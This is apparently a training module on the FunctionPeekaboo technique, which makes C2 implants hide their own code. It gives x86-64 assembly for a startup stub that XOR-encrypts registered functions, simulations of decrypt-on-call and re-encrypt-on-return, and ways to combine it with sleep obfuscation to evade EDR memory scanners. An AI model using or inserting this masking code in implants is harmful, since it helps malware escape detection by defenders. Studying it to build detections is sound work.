Difficulty: Advanced

Module 7: Initialization & Runtime Flow

From binary load to encrypted-at-rest — tracing the complete execution flow from startup through function calls.

Module Objective

Trace the complete runtime lifecycle of a FunctionPeekaboo-instrumented binary: the .stub entry point hijack, initial encryption of all registered functions, the transition to normal program execution, and the steady-state flow of decrypt-on-call and re-encrypt-on-return during operation.

1. The Boot Sequence

When Windows loads and starts the binary, FunctionPeekaboo hijacks the normal startup sequence. Here is the complete sequence from process creation to steady-state operation:

Boot Sequence: OS Loader (maps PE sections, resolves imports) → .stub Init (encrypts all functions, sets up TEB) → Original EP (CRT startup, mainCRTStartup()) → main() (application code, self-masking active)
| Step | What Happens | State of Registered Functions |
|---|---|---|
| 1. PE Loading | Windows maps the executable into memory, resolves imports, processes relocations | Cleartext (as compiled) |
| 2. Entry Point | Windows calls AddressOfEntryPoint, which points to .stub (set by modifyEP.py) | Cleartext |
| 3. .stub Init | The stub walks .funcmeta and XOR-encrypts every registered function body | Transitioning to encrypted |
| 4. TEB Setup | The stub initializes the TEB UserReserved fields to zero (no active function) | All encrypted |
| 5. Jump to Original EP | The stub jumps to the original entry point (saved during post-processing) | All encrypted |
| 6. CRT Initialization | mainCRTStartup runs: initializes the heap and stdio, runs static constructors | All registered functions encrypted (CRT code is not registered and stays in cleartext) |
| 7. main() Entry | Application code begins executing | All encrypted (self-masking active) |

2. The .stub Initialization Code

The .stub section contains the initialization routine. Its job is to encrypt all registered functions before any application code runs:

x86-64 Assembly
section .stub
_peekaboo_init:
    ; === Prologue: save all registers ===
    pushfq
    push    rax
    push    rbx
    push    rcx
    push    rdx
    push    rsi
    push    rdi
    push    r8
    push    r9
    push    r10
    push    r11

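    ; === Initialize TEB per-thread tracking fields ===
    ; NOTE: on x64, gs:[0x1478] is TEB.DeallocationStack and gs:[0x1480] /
    ; gs:[0x1488] are TlsSlots[0] / TlsSlots[1]; the x64 UserReserved array
    ; starts at gs:[0x168]. Verify these offsets against the PoC.
    xor     eax, eax
    mov     qword ptr gs:[0x1478], rax    ; tracking slot 0 = NULL (no active function)
    mov     qword ptr gs:[0x1480], rax    ; tracking slot 1 = 0
    mov     qword ptr gs:[0x1488], rax    ; tracking slot 2 = 0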

    ; === Find image base ===
    call    .Lgetip
.Lgetip:
    pop     rbx                            ; RBX = our address
    and     rbx, 0xFFFFFFFFFFFF0000        ; Align to 64KB
.Lscan:
    cmp     word ptr [rbx], 0x5A4D         ; "MZ"?
    je      .Lfound
    sub     rbx, 0x10000
    jmp     .Lscan
.Lfound:
    ; RBX = ImageBase

    ; === Find .funcmeta section ===
    mov     ecx, [rbx + 0x3C]             ; e_lfanew
    lea     rdx, [rbx + rcx]              ; PE header
    movzx   ecx, word ptr [rdx + 6]       ; NumberOfSections
    movzx   r8d, word ptr [rdx + 20]      ; SizeOfOptionalHeader
    lea     rsi, [rdx + 24 + r8]          ; First section header

.Lsec_loop:
    cmp     dword ptr [rsi], 0x6E75662E   ; ".fun"
    jne     .Lsec_next
    cmp     dword ptr [rsi+4], 0x74656D63 ; "cmet"
    je      .Lsec_found
.Lsec_next:
    add     rsi, 40
    dec     ecx
    jnz     .Lsec_loop
    jmp     .Ldone                         ; .funcmeta not found, skip

.Lsec_found:
    mov     ecx, [rsi + 12]               ; .funcmeta VirtualAddress
    lea     rsi, [rbx + rcx]              ; RSI = .funcmeta data

    ; === Iterate entries and encrypt each function ===
.Lentry_loop:
    mov     edi, [rsi]                     ; FunctionRVA
    test    edi, edi
    jz      .Ldone                         ; NULL terminator = end

    mov     ecx, [rsi + 4]                ; FunctionSize
    movzx   eax, byte ptr [rsi + 8]       ; XorKey

    ; Calculate function VA
    lea     rdi, [rbx + rdi]              ; RDI = function body address

    ; VirtualProtect to RW
    sub     rsp, 40                        ; Shadow space + oldProtect
    lea     r9, [rsp + 32]                ; &oldProtect
    mov     r8d, 0x04                     ; PAGE_READWRITE
    mov     edx, ecx                      ; Size
    mov     rcx, rdi                      ; Address
    call    [VirtualProtect_IAT]
    add     rsp, 40

    ; XOR encrypt the function body
    mov     ecx, [rsi + 4]                ; Reload size
    movzx   eax, byte ptr [rsi + 8]       ; Reload key
.Lxor:
    xor     byte ptr [rdi], al
    inc     rdi
    dec     ecx
    jnz     .Lxor

    ; Reload function address for VirtualProtect restore
    mov     edi, [rsi]
    lea     rdi, [rbx + rdi]

    ; VirtualProtect back to RX
    sub     rsp, 40
    lea     r9, [rsp + 32]
    mov     r8d, 0x20                     ; PAGE_EXECUTE_READ
    mov     edx, [rsi + 4]
    mov     rcx, rdi
    call    [VirtualProtect_IAT]
    add     rsp, 40

    ; Mark as encrypted
    mov     byte ptr [rsi + 9], 1

    ; Next entry
    add     rsi, 12
    jmp     .Lentry_loop

.Ldone:
    ; === Restore all registers ===
    pop     r11
    pop     r10
    pop     r9
    pop     r8
    pop     rdi
    pop     rsi
    pop     rdx
    pop     rcx
    pop     rbx
    pop     rax
    popfq

    ; === Jump to original entry point ===
    jmp     ORIGINAL_ENTRY_POINT          ; Patched by modifyEP.py
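The stub's .funcmeta walk can be modeled outside Windows to make the entry layout concrete. The Python sketch below is a simulation on plain byte buffers, not the PoC's code: the 12-byte layout is inferred from the offsets the listing reads (+0 FunctionRVA, +4 FunctionSize, +8 XorKey, +9 IsEncrypted, then `add rsi, 12`), the two trailing padding bytes are an assumption, and the helper names `parse_funcmeta` and `init_encrypt` are hypothetical. No memory protection is involved.

```python
import struct

# Hypothetical model of one .funcmeta entry, inferred from the stub's offsets:
# +0 FunctionRVA (u32), +4 FunctionSize (u32), +8 XorKey (u8),
# +9 IsEncrypted (u8), +10..11 padding (assumed) -> 12 bytes per entry.
ENTRY = struct.Struct("<IIBBxx")


def parse_funcmeta(meta: bytes):
    """Yield (offset, rva, size, key, is_encrypted) until an entry with RVA 0."""
    off = 0
    while off + ENTRY.size <= len(meta):
        rva, size, key, enc = ENTRY.unpack_from(meta, off)
        if rva == 0:  # NULL terminator, like `test edi, edi / jz .Ldone`
            return
        yield off, rva, size, key, enc
        off += ENTRY.size


def init_encrypt(image: bytearray, meta: bytearray) -> int:
    """Simulate .Lentry_loop: XOR every registered body, then set IsEncrypted=1."""
    count = 0
    for off, rva, size, key, _enc in list(parse_funcmeta(meta)):
        for i in range(rva, rva + size):
            image[i] ^= key          # the .Lxor loop
        meta[off + 9] = 1            # mov byte ptr [rsi + 9], 1
        count += 1
    return count


# Usage: a 64-byte fake "image" with two registered functions.
image = bytearray(range(64))
original = bytes(image)
meta = bytearray(
    ENTRY.pack(0x10, 8, 0x5A, 0) + ENTRY.pack(0x20, 4, 0x33, 0) + bytes(ENTRY.size)
)
print(init_encrypt(image, meta))  # 2
```

Applying the same XOR a second time with the same key restores the original bytes, which is the property the runtime handler relies on for decrypt-on-call.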

Timing Window

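Between PE loading (step 1) and .stub initialization (step 3), the registered functions are in cleartext. The window is short, but the stub is not the first user-mode code in the process: ntdll's loader, the DllMain routines of loaded DLLs (including any EDR DLL injected at process creation), and any TLS callbacks all run before AddressOfEntryPoint, so a scan from one of those points sees cleartext. The binary on disk is also cleartext, because encryption only happens at runtime. Once initialization completes, functions remain encrypted until explicitly called.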

3. Steady-State Runtime Flow

After initialization, the self-masking system operates transparently during normal program execution. Here is a detailed trace of what happens when a peekaboo function is called:

Caller code: call beacon_checkin

Time 0:    beacon_checkin body is ENCRYPTED (XOR'd garbage bytes)

Time 1:    Prologue stub executes:
           - CALL/POP gets current address
           - Pushes all registers + flags
           - Calls handler(func_ptr, DECRYPT)

Time 2:    Handler executes:
           - Finds PE image base
           - Parses .funcmeta, finds beacon_checkin entry
           - VirtualProtect(body, size, PAGE_READWRITE)
           - XOR decrypts body bytes
           - VirtualProtect(body, size, PAGE_EXECUTE_READ)
           - Sets IsEncrypted = 0
           - Stores func_ptr in TEB UserReserved[0]

Time 3:    Prologue stub continues:
           - Pops all registers + flags
           - Falls through to now-decrypted function body

Time 4:    beacon_checkin body executes NORMALLY
           (all original instructions run as compiled)

Time 5:    beacon_checkin reaches a RET instruction
           Epilogue stub executes:
           - Pushes all registers + flags
           - Calls handler(func_ptr, ENCRYPT)

Time 6:    Handler executes:
           - VirtualProtect(body, size, PAGE_READWRITE)
           - XOR encrypts body bytes
           - VirtualProtect(body, size, PAGE_EXECUTE_READ)
           - Sets IsEncrypted = 1
           - Clears TEB UserReserved[0]

Time 7:    Epilogue stub continues:
           - Pops all registers + flags
           - Executes RET (returns to caller)

Time 8:    beacon_checkin body is ENCRYPTED again
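The Time 0 to Time 8 sequence reduces to a small state machine. This Python model is illustrative only: `Func`, `handler`, `call`, and the `teb` dictionary are hypothetical stand-ins, the VirtualProtect steps are reduced to a comment, and the example bytes are arbitrary.

```python
DECRYPT, ENCRYPT = "DECRYPT", "ENCRYPT"

teb = {"UserReserved0": None}  # stand-in for the per-thread TEB slot
trace = []                     # records handler calls in order


class Func:
    def __init__(self, name: str, clear: bytes, key: int):
        self.name = name
        self.key = key
        self.body = bytearray(b ^ key for b in clear)  # encrypted at rest (Time 0)
        self.is_encrypted = 1


def handler(f: Func, op: str) -> None:
    trace.append((f.name, op))
    # Real handler: VirtualProtect(RW) -> XOR -> VirtualProtect(RX); only the XOR is modeled.
    for i in range(len(f.body)):
        f.body[i] ^= f.key
    if op == DECRYPT:
        f.is_encrypted = 0
        teb["UserReserved0"] = f.name   # Time 2: remember the active function
    else:
        f.is_encrypted = 1
        teb["UserReserved0"] = None     # Time 6: no active function


def call(f: Func, run):
    handler(f, DECRYPT)          # Time 1-3: prologue stub
    result = run(bytes(f.body))  # Time 4: body executes on cleartext bytes
    handler(f, ENCRYPT)          # Time 5-7: epilogue stub before RET
    return result


# Usage: arbitrary example bytes (push rbp; mov rbp, rsp; ret).
CLEAR = b"\x55\x48\x89\xe5\xc3"
beacon_checkin = Func("beacon_checkin", CLEAR, 0x41)
seen = call(beacon_checkin, lambda body: body)
print(seen == CLEAR, beacon_checkin.is_encrypted)  # True 1
```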

4. Function Call Chains

Real programs involve deep call chains. Here is how FunctionPeekaboo handles nested calls between instrumented functions:

Nested Call Example

main() calls func_A() calls func_B() calls func_C()
(only func_A and func_C are peekaboo-registered)

Step 1: main calls func_A
  - func_A prologue: DECRYPT func_A
  - State: func_A=clear, func_B=N/A, func_C=encrypted

Step 2: func_A calls func_B (NOT registered)
  - No prologue/epilogue stubs
  - func_B runs normally
  - State: func_A=clear, func_C=encrypted

Step 3: func_B calls func_C
  - func_C prologue: DECRYPT func_C
  - State: func_A=clear, func_C=clear (2 decrypted)

Step 4: func_C returns to func_B
  - func_C epilogue: ENCRYPT func_C
  - State: func_A=clear, func_C=encrypted

Step 5: func_B returns to func_A
  - No epilogue (func_B not registered)
  - State: func_A=clear, func_C=encrypted

Step 6: func_A returns to main
  - func_A epilogue: ENCRYPT func_A
  - State: all encrypted
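The same bookkeeping can be replayed for the nested chain. In this hypothetical Python model, `enter` and `leave` play the role of the prologue and epilogue stubs and do nothing for unregistered functions; `snap` records the encryption state at each point so it can be compared with Steps 1 to 6.

```python
registered = {"func_A", "func_C"}                    # func_B has no stubs
state = {name: "encrypted" for name in registered}   # after .stub init
snapshots = []


def enter(name: str) -> None:   # prologue stub, present only if registered
    if name in registered:
        state[name] = "clear"


def leave(name: str) -> None:   # epilogue stub, present only if registered
    if name in registered:
        state[name] = "encrypted"


def snap(label: str) -> None:
    snapshots.append((label, dict(sorted(state.items()))))


def func_C() -> None:
    enter("func_C")
    snap("inside func_C")       # Step 3: two functions decrypted
    leave("func_C")


def func_B() -> None:
    enter("func_B")             # no-op: not registered
    func_C()
    snap("back in func_B")      # Step 4
    leave("func_B")             # no-op


def func_A() -> None:
    enter("func_A")
    snap("inside func_A")       # Step 1
    func_B()
    snap("back in func_A")      # Step 5
    leave("func_A")


func_A()
snap("back in main")            # Step 6

for label, s in snapshots:
    print(f"{label:15} {s}")
```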

5. Thread Safety

In a multithreaded implant, different threads may call different peekaboo functions simultaneously. The handler must be thread-safe:

| Concern | How FunctionPeekaboo Handles It |
|---|---|
| TEB state | Per-thread (each thread has its own TEB, reached via GS), so there is no shared tracking state |
| .funcmeta writes | The IsEncrypted flag is a single byte, and single-byte stores are atomic on x86. The check-then-act sequence (read the flag, XOR the body, write the flag) is not atomic, so two threads calling the same function simultaneously race |
| Same function, two threads | If thread A has already decrypted func_X, thread B sees IsEncrypted=0 and skips decryption; if A then re-encrypts on return while B is still executing, B runs garbage. If both threads read IsEncrypted=1 before either writes it, both XOR the body and the second XOR re-encrypts it |
| VirtualProtect | Affects the entire process: protections apply to whole pages, not to threads. While a function's pages are RW (not executable), any other code sharing those pages faults if another thread executes it |
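The double-decryption case follows directly from XOR being its own inverse. The deterministic Python sketch below replays one bad interleaving by hand (no real threads): both threads read IsEncrypted=1 before either writes it, both apply the key, and the body ends up encrypted again while the flag claims cleartext. The key and bytes are arbitrary.

```python
KEY = 0x5A
CLEAR = b"\x48\x83\xec\x28"                 # arbitrary example bytes: sub rsp, 0x28
body = bytearray(b ^ KEY for b in CLEAR)    # encrypted at rest
is_encrypted = 1

# Interleaving: thread A and thread B both run the flag check first...
a_saw = is_encrypted
b_saw = is_encrypted

# ...then each performs the "decrypt" step it believes is needed.
for saw in (a_saw, b_saw):
    if saw:
        for i in range(len(body)):
            body[i] ^= KEY
        is_encrypted = 0                    # the byte store is atomic, but too late

print(is_encrypted, bytes(body) == CLEAR)   # 0 False
```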

The Thread Race Problem

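The most critical thread safety issue: if two threads call the same peekaboo function, thread A might re-encrypt it (on return) while thread B is still executing it. The simplest mitigation is a reference counter per function in .funcmeta: the first caller decrypts, and the body is re-encrypted only when the counter drops back to zero. The counter update and the XOR must happen under the same lock; otherwise thread B can increment the counter and jump into a body that thread A is still decrypting. The PoC may not fully address this; production implementations like Nighthawk use more sophisticated synchronization.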
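A minimal sketch of the reference-counting mitigation, in Python with real threads. It is a hypothetical design rather than the PoC's code: the class name `MaskedFunction`, the lock, and the byte buffer standing in for the function body are all assumptions. The key point is that one lock covers both the counter and the XOR, so no thread can observe a half-decrypted body.

```python
import threading


class MaskedFunction:
    """Hypothetical per-function state: body bytes, XOR key, and a refcount."""

    def __init__(self, clear: bytes, key: int):
        self.key = key
        self.body = bytearray(b ^ key for b in clear)  # encrypted at rest
        self.refcount = 0
        self.lock = threading.Lock()  # guards the refcount AND the XOR together

    def _xor(self) -> None:
        for i in range(len(self.body)):
            self.body[i] ^= self.key

    def enter(self) -> None:          # prologue stub
        with self.lock:
            if self.refcount == 0:
                self._xor()           # first caller decrypts
            self.refcount += 1

    def leave(self) -> None:          # epilogue stub
        with self.lock:
            self.refcount -= 1
            if self.refcount == 0:
                self._xor()           # last caller re-encrypts


CLEAR = b"\x55\x48\x89\xe5\xc3"       # arbitrary example bytes
func_x = MaskedFunction(CLEAR, 0x41)
bad_reads = []


def worker() -> None:
    for _ in range(2000):
        func_x.enter()
        if bytes(func_x.body) != CLEAR:   # must be cleartext while we hold a reference
            bad_reads.append(1)
        func_x.leave()


threads = [threading.Thread(target=worker) for _ in range(4)]
for t in threads:
    t.start()
for t in threads:
    t.join()

print(len(bad_reads), func_x.refcount)   # 0 0
```

Because the XOR only ever runs on the 0→1 and 1→0 transitions, and both transitions happen under the lock, a thread holding a reference always sees the cleartext body.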

6. Exception Handling Considerations

If a peekaboo function throws an exception (C++ exception, SEH, or hardware exception), the normal return path is bypassed. The epilogue stub never runs, leaving the function decrypted:

Exception Scenarios

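| Exception Type | Impact | Mitigation |
|---|---|---|
| C++ throw | Stack unwinding skips the epilogue stub | Attach a handler that re-encrypts on unwind. On x64, SEH is table-based, so this means unwind data (.pdata/.xdata, or RtlAddFunctionTable at runtime) rather than a handler registered in the prologue as on x86 |
| SEH exception | If caught by a handler in a parent frame, the epilogue is skipped | Use __finally blocks or custom unwind handlers |
| Access violation | If unhandled, the process terminates and re-encryption is irrelevant; if caught by SEH or VEH, it behaves like the other rows | None needed when unhandled (the process is dying) |
| VEH handler | A vectored exception handler might resume execution; the function stays decrypted | The VEH handler should check the TEB state and re-encrypt if needed |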

The PoC FunctionPeekaboo focuses on the happy path. A production implementation would register unwind handlers to ensure re-encryption even on exceptional control flow paths.
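The difference between the happy-path stubs and an unwind-aware design can be shown with Python's try/finally, which here stands in for a `__finally` block or unwind handler (an analogy, not the Windows SEH mechanism). Both call wrappers below are hypothetical; only the second one re-encrypts when the body raises.

```python
class Masked:
    def __init__(self, clear: bytes, key: int):
        self.key = key
        self.body = bytearray(b ^ key for b in clear)
        self.is_encrypted = True

    def toggle(self) -> None:
        for i in range(len(self.body)):
            self.body[i] ^= self.key
        self.is_encrypted = not self.is_encrypted


def call_happy_path(f: Masked, run) -> None:
    f.toggle()      # prologue: decrypt
    run()           # an exception here skips the epilogue below
    f.toggle()      # epilogue: re-encrypt


def call_with_unwind(f: Masked, run) -> None:
    f.toggle()      # prologue: decrypt
    try:
        run()
    finally:
        f.toggle()  # runs on normal return and while the exception propagates


def faulting_body() -> None:
    raise RuntimeError("exception inside a peekaboo function")


results = {}
for wrapper in (call_happy_path, call_with_unwind):
    f = Masked(b"\x90\x90\xc3", 0x41)   # arbitrary bytes: nop; nop; ret
    try:
        wrapper(f, faulting_body)
    except RuntimeError:
        pass        # caught in a "parent frame"
    results[wrapper.__name__] = f.is_encrypted

print(results)  # {'call_happy_path': False, 'call_with_unwind': True}
```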

7. Integration with Sleep Obfuscation

FunctionPeekaboo and sleep obfuscation can be combined for maximum coverage:

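Combined Protection Timeline (percentages refer to registered-function code):

Active Phase (checking in, executing commands):
  FunctionPeekaboo: ~98% of registered code encrypted (only functions currently executing are decrypted)
  Sleep obfuscation: not active (implant is awake)
  Net coverage: ~98% of registered code

Sleep Phase (waiting between check-ins):
  FunctionPeekaboo: 100% of registered code encrypted (no function executing)
  Sleep obfuscation: 100% encrypted (entire image masked)
  Net coverage: 100% (registered functions are double encrypted)

Result: While awake, only the registered functions on the current call stack (~2% of registered code) are in cleartext; unregistered code such as the CRT is not masked by FunctionPeekaboo and is covered only during sleep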
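The ~98% figure depends on how the registered code is sized. The cleartext share is the size of the registered functions currently decrypted divided by the total size of all registered functions. The numbers below are hypothetical (50 equal-sized functions), chosen to show where ~2% comes from and how nesting changes it; unregistered code is outside this ratio entirely.

```python
def cleartext_share(sizes: dict[str, int], decrypted: set[str]) -> float:
    """Fraction of registered-function bytes that are in cleartext right now."""
    total = sum(sizes.values())
    return sum(sizes[name] for name in decrypted) / total


# Hypothetical implant: 50 registered functions of 1 KB each.
sizes = {f"func_{i}": 1024 for i in range(50)}

one_active = cleartext_share(sizes, {"func_0"})          # a single active function
nested = cleartext_share(sizes, {"func_0", "func_1"})    # two on the call stack
print(f"{one_active:.0%} {nested:.0%}")                  # 2% 4%
```

With uneven sizes the share can be far higher: if one large function holds most of the registered code, the active phase exposes most of it whenever that function runs.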

Layered Defense

Using both techniques together means the implant has strong protection in both active and passive states. Sleep obfuscation handles the sleep window, and FunctionPeekaboo handles the active window. The ~2% gap during active execution is only the registered code currently running (one function, or several when registered calls are nested), a very small signature surface for any scanner to catch. Unregistered code is the exception: it stays in cleartext whenever the implant is awake.

8. Debugging FunctionPeekaboo Binaries

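Debugging is more complex because function bodies are encrypted at rest: disassembling a registered function before it is called shows XOR'd garbage. Software breakpoints add a further trap, because the debugger writes an INT3 byte (0xCC) into the body, and the handler's XOR loop then transforms that byte along with the rest, so the breakpoint can fail to fire or corrupt the function. Hardware breakpoints (debug registers) do not modify code and avoid this problem.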

Debugging Tips

9. Performance Profiling

| Operation | Typical Latency | Notes |
|---|---|---|
| Prologue stub (register save) | ~10 ns | Push instructions, fast |
| Handler: PE parsing | ~50 ns | Memory reads, cached after first call |
| Handler: .funcmeta lookup | ~20 ns | Linear scan, typically <20 entries |
| Handler: VirtualProtect (RX→RW) | ~1-5 μs | System call, dominates total time |
| Handler: XOR loop (1 KB function) | ~100 ns | Fast, memory-bound |
| Handler: VirtualProtect (RW→RX) | ~1-5 μs | Second system call |
| Epilogue stub (register restore) | ~10 ns | Pop instructions, fast |
| Total per call + return | ~4-20 μs | The handler runs twice (decrypt, then encrypt), so four VirtualProtect calls in total dominate |

For a C2 beacon that checks in every 60 seconds, a worst-case overhead of 20μs per function call is negligible. Even with a few dozen peekaboo calls per check-in cycle, the total stays around 1ms or less (48 calls at the worst-case 20μs is 0.96ms), invisible to the user and the C2 framework.
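The arithmetic behind these figures, using the table's per-operation numbers: each call plus return runs the handler twice, and each handler run makes two VirtualProtect calls, so the syscall cost alone is four times the per-call VirtualProtect latency. The call count of 48 per cycle is a hypothetical stand-in for "dozens", and the sub-microsecond work (stubs, parsing, XOR) is ignored.

```python
VIRTUALPROTECT_US = (1.0, 5.0)   # per-call latency range from the table


def per_call_us(vp_us: float) -> float:
    """Cost of one call+return: 2 handler runs x 2 VirtualProtect calls each."""
    return 2 * 2 * vp_us


def cycle_overhead_ms(calls_per_cycle: int, vp_us: float) -> float:
    return calls_per_cycle * per_call_us(vp_us) / 1000.0


best, worst = (per_call_us(v) for v in VIRTUALPROTECT_US)
print(best, worst)                                  # 4.0 20.0 (microseconds)

ms = cycle_overhead_ms(48, VIRTUALPROTECT_US[1])    # 48 calls at worst case
print(ms, ms / 60_000)                              # ms, and share of a 60 s interval
```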

Knowledge Check

Q1: When are all registered functions first encrypted?

A) At compile time by the LLVM backend
B) At runtime by the .stub initialization code, before the CRT runs
C) When the first function is called
D) During the modifyEP.py post-processing step

Q2: What is the main thread safety risk with FunctionPeekaboo?

A) TEB fields are shared between threads
B) VirtualProtect only works on the main thread
C) Two threads calling the same function can race: one re-encrypts while the other is still executing
D) The XOR engine is not thread-safe

Q3: What dominates the per-function-call performance overhead?

A) VirtualProtect system calls (~1-5μs each, two per operation)
B) The XOR encryption loop
C) PE header parsing
D) Register save/restore in the stubs